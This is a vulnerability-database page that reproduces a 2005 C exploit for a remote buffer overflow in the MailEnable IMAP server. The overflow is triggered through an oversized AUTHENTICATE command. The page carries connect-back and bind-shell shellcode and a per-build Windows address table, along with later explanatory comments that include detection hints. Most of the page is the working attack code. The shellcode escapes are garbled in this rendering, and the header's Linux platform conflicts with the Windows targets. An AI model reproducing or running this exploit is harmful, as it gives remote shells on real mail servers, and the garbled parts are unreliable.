MailEnable Enterprise 1.x – IMAPd Remote Overflow

MailEnable Enterprise 1.x – IMAPd Remote Overflow

漏洞ID 1054994 漏洞类型
发布时间 2005-04-05 更新时间 2005-04-05
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/915
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
      +--=[--------------------------x0n3-h4ck Team Presents---------------------------]=--+
      +--=[                                                                            ]=--+
      +--=[ MailEnable (Enterprise <= 1.04)(Professional <= 1.54) remote Imapd exploit ]=--+
      +--=[                                                                            ]=--+
      +--=[  Bug discovered by..: Corryl    ([email protected])                       ]=--+
      +--=[  Exploit coded by...: Expanders ([email protected])                      ]=--+
      +--=[                                                       wwww.x0n3-h4ck.org   ]=--+
      +--=[----------------------------------------------------------------------------]=--+
      
      Personal greetz goes to: crash-x for some code from his Cyrus Imapd sploit
                               cybertronic for reverse shellcode
                               K-C0d3r for coding support
                               x0n3-h4ck.org Members and Friends
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>

/*
Connectback Shellcode ::: 316 byte
Link points:
     Ip  : [111] unsigned long  (xored 0x99999999)
     Port: [118] unsigned short (xored 0x9999)
*/

/*
 * Connect-back payload as rendered on this page. The header comment above
 * states 316 bytes, with the callback IP at offset 111 and the port at
 * offset 118, each XOR-masked (0x99999999 / 0x9999); make_reverseshell()
 * is the only code that writes those two slots. In this rendering the byte
 * escapes appear without their backslashes, so the literal below is plain
 * ASCII text here and the stated length and offsets cannot be checked
 * against it. Treat the contents as opaque. From a defensive standpoint the
 * observable behaviour described by the header is an outbound TCP connection
 * from the mail-server process to an operator-chosen address and port.
 */
unsigned char reverse_sc[] =
"xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA"
"xEBx05xE8xEBxFFxFFxFFx70x62x99x99x99xC6xFDx38xA9"
"x99x99x99x12xD9x95x12xE9x85x34x12xF1x91x12x6ExF3"
"x9DxC0x71x02x99x99x99x7Bx60xF1xAAxABx99x99xF1xEE"
"xEAxABxC6xCDx66x8Fx12x71xF3x9DxC0x71x1Bx99x99x99"
"x7Bx60x18x75x09x98x99x99xCDxF1x98x98x99x99x66xCF"
"x89xC9xC9xC9xC9xD9xC9xD9xC9x66xCFx8Dx12x41xF1xE6"
"x99x99x98xF1x9Bx99x9Dx4Bx12x55xF3x89xC8xCAx66xCF"
"x81x1Cx59xECxD3xF1xFAxF4xFDx99x10xFFxA9x1Ax75xCD"
"x14xA5xBDxF3x8CxC0x32x7Bx64x5FxDDxBDx89xDDx67xDD"
"xBDxA4x10xC5xBDxD1x10xC5xBDxD5x10xC5xBDxC9x14xDD"
"xBDx89xCDxC9xC8xC8xC8xF3x98xC8xC8x66xEFxA9xC8x66"
"xCFx9Dx12x55xF3x66x66xA8x66xCFx91xCAx66xCFx85x66"
"xCFx95xC8xCFx12xDCxA5x12xCDxB1xE1x9Ax4CxCBx12xEB"
"xB9x9Ax6CxAAx50xD0xD8x34x9Ax5CxAAx42x96x27x89xA3"
"x4FxEDx91x58x52x94x9Ax43xD9x72x68xA2x86xECx7ExC3"
"x12xC3xBDx9Ax44xFFx12x95xD2x12xC3x85x9Ax44x12x9D"
"x12x9Ax5Cx32xC7xC0x5Ax71x99x66x66x66x17xD7x97x75"
"xEBx67x2Ax8Fx34x40x9Cx57x76x57x79xF9x52x74x65xA2"
"x40x90x6Cx34x75x60x33xF9x7ExE0x5FxE0";

/*
Portbind Shellcode ::: 492 byte
Link points:
     Port: [266] unsigned short (xored 0x8888)
*/
/*
 * Bind-listener payload as rendered on this page. The header comment above
 * states 492 bytes with the listening port at offset 266, XOR-masked with
 * 0x8888; make_bindshell() is the only code that writes that slot. As with
 * reverse_sc, the byte escapes have lost their backslashes in this rendering,
 * so the literal is plain ASCII text here and cannot be checked against the
 * stated length. Treat the contents as opaque. Per the header and main(),
 * the observable behaviour is a new listening TCP socket (default port 7320,
 * set with -b) owned by the IMAP service process on the target host.
 */
unsigned char portbind_sc[] = 
"x90x90x90x90x90x90x90x90"
"xEBx03x5DxEBx05xE8xF8xFF"
"xFFxFFx8BxC5x83xC0x11x33xC9x66xB9xC9x01x80x30x88" 
"x40xE2xFAxDDx03x64x03x7Cx09x64x08x88x88x88x60xC4" 
"x89x88x88x01xCEx74x77xFEx74xE0x06xC6x86x64x60xD9" 
"x89x88x88x01xCEx4ExE0xBBxBAx88x88xE0xFFxFBxBAxD7" 
"xDCx77xDEx4Ex01xCEx70x77xFEx74xE0x25x51x8Dx46x60"
"xB8x89x88x88x01xCEx5Ax77xFEx74xE0xFAx76x3Bx9Ex60" 
"xA8x89x88x88x01xCEx46x77xFEx74xE0x67x46x68xE8x60" 
"x98x89x88x88x01xCEx42x77xFEx70xE0x43x65x74xB3x60" 
"x88x89x88x88x01xCEx7Cx77xFEx70xE0x51x81x7Dx25x60" 
"x78x88x88x88x01xCEx78x77xFEx70xE0x2Cx92xF8x4Fx60" 
"x68x88x88x88x01xCEx64x77xFEx70xE0x2Cx25xA6x61x60" 
"x58x88x88x88x01xCEx60x77xFEx70xE0x6DxC1x0ExC1x60" 
"x48x88x88x88x01xCEx6Ax77xFEx70xE0x6FxF1x4ExF1x60" 
"x38x88x88x88x01xCEx5ExBBx77x09x64x7Cx89x88x88xDC" 
"xE0x89x89x88x88x77xDEx7CxD8xD8xD8xD8xC8xD8xC8xD8" 
"x77xDEx78x03x50xDFxDFxE0x8Ax88xABx6Fx03x44xE2x9E" 
"xD9xDBx77xDEx64xDFxDBx77xDEx60xBBx77xDFxD9xDBx77" 
"xDEx6Ax03x58x01xCEx36xE0xEBxE5xECx88x01xEEx4Ax0B" 
"x4Cx24x05xB4xACxBBx48xBBx41x08x49x9Dx23x6Ax75x4E" 
"xCCxACx98xCCx76xCCxACxB5x01xDCxACxC0x01xDCxACxC4" 
"x01xDCxACxD8x05xCCxACx98xDCxD8xD9xD9xD9xC9xD9xC1" 
"xD9xD9x77xFEx4AxD9x77xDEx46x03x44xE2x77x77xB9x77" 
"xDEx5Ax03x40x77xFEx36x77xDEx5Ex63x16x77xDEx9CxDE"
"xECx29xB8x88x88x88x03xC8x84x03xF8x94x25x03xC8x80" 
"xD6x4Ax8Cx88xDBxDDxDExDFx03xE4xACx90x03xCDxB4x03" 
"xDCx8DxF0x8Bx5Dx03xC2x90x03xD2xA8x8Bx55x6BxBAxC1" 
"x03xBCx03x8Bx7DxBBx77x74xBBx48x24xB2x4CxFCx8Fx49" 
"x47x85x8Bx70x63x7AxB3xF4xACx9CxFDx69x03xD2xACx8B" 
"x55xEEx03x84xC3x03xD2x94x8Bx55x03x8Cx03x8Bx4Dx63"
"x8AxBBx48x03x5DxD7xD6xD5xD3x4Ax8Cx88";


int make_bindshell(int port);
int make_reverseshell(char *ip, char *port);
void help(char *program_name);


/*
 * Per-build address table, selected by -t as an index into this array.
 * Each entry carries two 4-byte values written as string escapes: retloc,
 * which main() copies to offset 1026 of the request argument, and ecxloc,
 * copied to offsets 1016 and 1022. The list ends with a NULL platform entry;
 * both main() and help() walk to that sentinel to count targets. Every
 * listed platform is a Windows build of MailEnable Enterprise/Professional,
 * although the page header above records the platform as Linux. As elsewhere
 * in this rendering, the escapes appear without their backslashes.
 */
struct vuln{char *platform;char *retloc;char *ecxloc;} targets[]= {
    { "Windows   2003 - M. E. Enterprise", "xECxDAx07x01", "xE4xDAx07x01",  },
    { "Windows   2003 - M. E. Professional", "xECxDAx08x01", "xE4xDAx08x01", },
    { "Windows 2k Sp4 - M. E. Enterprise", "x80xE3x69x01", "x78xE3x69x01", },
    { "Windows 2k Sp4 - M. E. Professional", "x80xE3x6Ax01", "x78xE3x6Ax01", },
    { "Windows XP Sp2 - M. E. Enterprise", "xF4x22x19x01", "xECx22x19x01", },
    { "Windows XP Sp2 - M. E. Professional", "xF4x22xB2x00", "xECx22xB2x00", },
    { "Windows XP Sp1 - M. E. Enterprise", "xF4x22x03x01", "xECx22x03x01", },
    { "Windows XP Sp1 - M. E. Professional", "xE8xDAx02x01", "xE0xDAx02x01", },
    { NULL }
};

/*
 * Entry point. Parses -h/-p/-t/-b/-r, connects to the IMAP port and sends a
 * single "A001 AUTHENTICATE <argument>" line whose argument is roughly 1 KB
 * of filler followed by four address words and one of the two payloads.
 *
 * For a defender the notable part is the shape of that one request. A
 * legitimate AUTHENTICATE argument is a short SASL mechanism name, so an
 * argument of this size, consisting mostly of a single repeated byte and
 * ending in a NOP run, is a reliable indicator for IMAP-aware inspection and
 * for mail-server logs that record malformed commands. The follow-on
 * behaviour to look for on the host is either a new listening socket (bind
 * mode) or an outbound connection (reverse mode) from the IMAP service.
 *
 * Strings in this listing have lost their backslash escapes (e.g. the
 * trailing "n" on each message); the text is reproduced as rendered.
 */
int main(int argc, char *argv[]) {

    struct sockaddr_in trg;
    struct hostent *he;
    long addr;                      /* unused */
    unsigned short port;            /* unused */
    unsigned long ip;               /* unused */
    int sockfd, buff,rc,opt,i;
    int target=0,rport=143,lport=7320;   /* defaults: IMAP 143, shell port 7320 */
    char *host=NULL,*lhost=NULL,*cbport;
    char evilbuf[2048];             /* request argument, built below */
    char buffer[1024];              /* server reply (only 256 bytes are read) */
    char *request;
    if(argc < 3 ) {
	help(argv[0]);
	exit(0);
    }
    while ((opt = getopt (argc, argv, "h:p:t:b:r:")) != -1){
          switch (opt){
	        case 'h':
	            host = optarg;
	            break;
	        case 'p':
                rport = atoi(optarg);
                if(rport > 65535 || rport < 1){
                    printf("[-] Port %d is invalidn",rport);
                    return 1;
                }
                break;
            case 't':
                target = atoi(optarg);
                /* count table entries up to the NULL sentinel; 1337 is
                 * accepted as a magic value outside the table */
                for(i = 0; targets[i].platform; i++);
                if(target >= i && target != 1337){
                    printf("[-] Wtf are you trying to target?n");
                    help(argv[0]);
                }
                break;
            case 'b':
                lport = atoi(optarg);
                cbport = optarg;    /* string form is passed to make_reverseshell */
                if(lport > 65535 || lport < 1){
                    printf("[-] Port %d is invalidn",lport);
                    return 1;
                }
                break;
            case 'r':
                lhost = optarg;     /* presence of -r selects reverse mode below */
                break;
            default:
                help(argv[0]);
        }
    }
    
    if(host == NULL)
        help(argv[0]);

    printf("nn-=[ MailEnable Imapd remote exploit ::: Coded by Expanders ]=-n");
    he = gethostbyname(host);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    request = (char *) malloc(12344);   /* holds the command prefix + evilbuf */
    trg.sin_family = AF_INET;
    trg.sin_port = htons(rport);
    trg.sin_addr = *((struct in_addr *) he->h_addr);
    memset(&(trg.sin_zero), '', 8);
    printf("nn[-] Targeting: %sn",targets[target].platform);
    if ( lhost != NULL )
       printf("[-] Reverse Shell on %s:%dnn",lhost,lport);
    else
       printf("[-] Bind Shell on %s:%dnn",host,lport);
    printf("[-]Connecting to target   t...");
    rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
    if(rc==0) {
              printf("[Done]n[-]Building evil buffer   t...");
              /* Request-argument layout (byte offsets into evilbuf):
               *   0..1015  'A' filler
               *   1016     ecxloc (4 bytes)      1020  "AA"
               *   1022     ecxloc (4 bytes)      1026  retloc (4 bytes)
               *   1030     0x90 x4
               *   1034..   payload (bind or reverse, chosen by -r)
               * Both sizeof() copies include the array's NUL terminator,
               * which is what ends the %s expansion in the sprintf below. */
              memset(evilbuf,'A',1016);
              memcpy(evilbuf+1016,targets[target].ecxloc,4);;
              memset(evilbuf+1020,'A',2);
              memcpy(evilbuf+1022,targets[target].ecxloc,4);
              memcpy(evilbuf+1026,targets[target].retloc,4);
              memset(evilbuf+1030,0x90,4);
              if ( lhost == NULL) {
                 make_bindshell(lport);
                 memcpy(evilbuf+1034,portbind_sc,sizeof(portbind_sc));
              } else {
                make_reverseshell(lhost,cbport);
                memcpy(evilbuf+1034,reverse_sc,sizeof(reverse_sc));
              }
              printf("[Done]n[-]Sending evil request   t...");
              /* one IMAP command line; the CRLF is rendered here as "rn" */
              sprintf(request,"A001 AUTHENTICATE %srn",evilbuf);
              send(sockfd,request,strlen(request),0);
              /* read up to 256 bytes of the reply; the result is never examined */
              buff=recv(sockfd, buffer, 256, 0);
              if ( lhost == NULL)
                 printf("[Done]nn[------Now-telnet-(%s %d)------]nn",host,lport);
              else
                 printf("[Done]nn[------Now-wait-reverse-on-port-%d------]nn",lport);
    }
    else
              printf("[Fail] -> Unable to connectnn");
    close(sockfd);
    return 0;
}

/*
 * Patches the listening port into portbind_sc at offset 266 (the slot named
 * in that array's header comment). The port is XOR-masked with 0x8888 and
 * byte-swapped with htons(); the result is stored back into the int
 * parameter and its first two bytes in memory are copied, so which half of
 * the int lands in the payload depends on host byte order (assumes a
 * little-endian host). Declared int but has no return statement; the single
 * caller in main() ignores the result.
 */
int make_bindshell(int port) {
   port = htons(port^(unsigned short)0x8888);
   memcpy(&portbind_sc[266], &port, 2);
}

/*
 * Patches the callback address into reverse_sc: the dotted-quad `ip` goes to
 * offset 111 and the decimal `port` string to offset 118, matching the slots
 * named in that array's header comment. Both are XOR-masked (0x99999999 and
 * 0x9999) and the port is byte-swapped with htons(). xorip is an unsigned
 * long, which is wider than 4 bytes on LP64 hosts; only its first 4 bytes in
 * memory are copied, so this assumes a little-endian host. inet_addr() and
 * atoi() failures are not checked. Declared int but has no return statement;
 * the single caller in main() ignores the result.
 */
int make_reverseshell(char *ip, char *port) {
    unsigned long xorip;
    unsigned short xorport;
    xorip = inet_addr(ip)^(unsigned long)0x99999999;
    xorport = htons(atoi( port )^(unsigned short)0x9999);
    memcpy ( &reverse_sc[111], &xorip, 4);
    memcpy ( &reverse_sc[118], &xorport, 2);
}
/*
 * Prints the banner, usage line, option list and the numbered target table
 * (every targets[] entry up to the NULL sentinel) to stdout and returns;
 * callers decide whether to exit afterwards. All literal strings are
 * reproduced exactly as rendered on this page, where escape sequences
 * appear without their backslashes.
 */
void help(char *program_name) {
  static const char *const banner_lines[] = {
    "nt-=[  Mail Enable Pro & Enterprise Imapd Remote Exploit  ]=-n",
    "t-=[                  www.x0n3-h4ck.org                  ]=-n",
    "t-=[    Discovered by CorryL     Coded by Expanders      ]=-nn",
  };
  static const char *const option_lines[] = {
    "Parameters:n",
    "tt-h <host>   : Host to attackn",
    "tt-p <port>   : Imapd Port (Default 143)n",
    "tt-t <target> : Target type (Default 0)n",
    "tt-b <port>   : Bind or reverse shell port (Default 7320)n",
    "tt-r <host>   : Local ip for reverse shelln",
    "Target List:n",
  };
  size_t k;
  struct vuln *entry;

  for (k = 0; k < sizeof banner_lines / sizeof banner_lines[0]; k++)
    fputs(banner_lines[k], stdout);

  printf("Usage: %s -h <Host> [parameters]nn", program_name);

  for (k = 0; k < sizeof option_lines / sizeof option_lines[0]; k++)
    fputs(option_lines[k], stdout);

  /* one numbered line per target; the table ends at the NULL platform */
  for (entry = targets; entry->platform != NULL; entry++)
    printf("tt%dt %sn", (int)(entry - targets), entry->platform);
}

// milw0rm.com [2005-04-05]
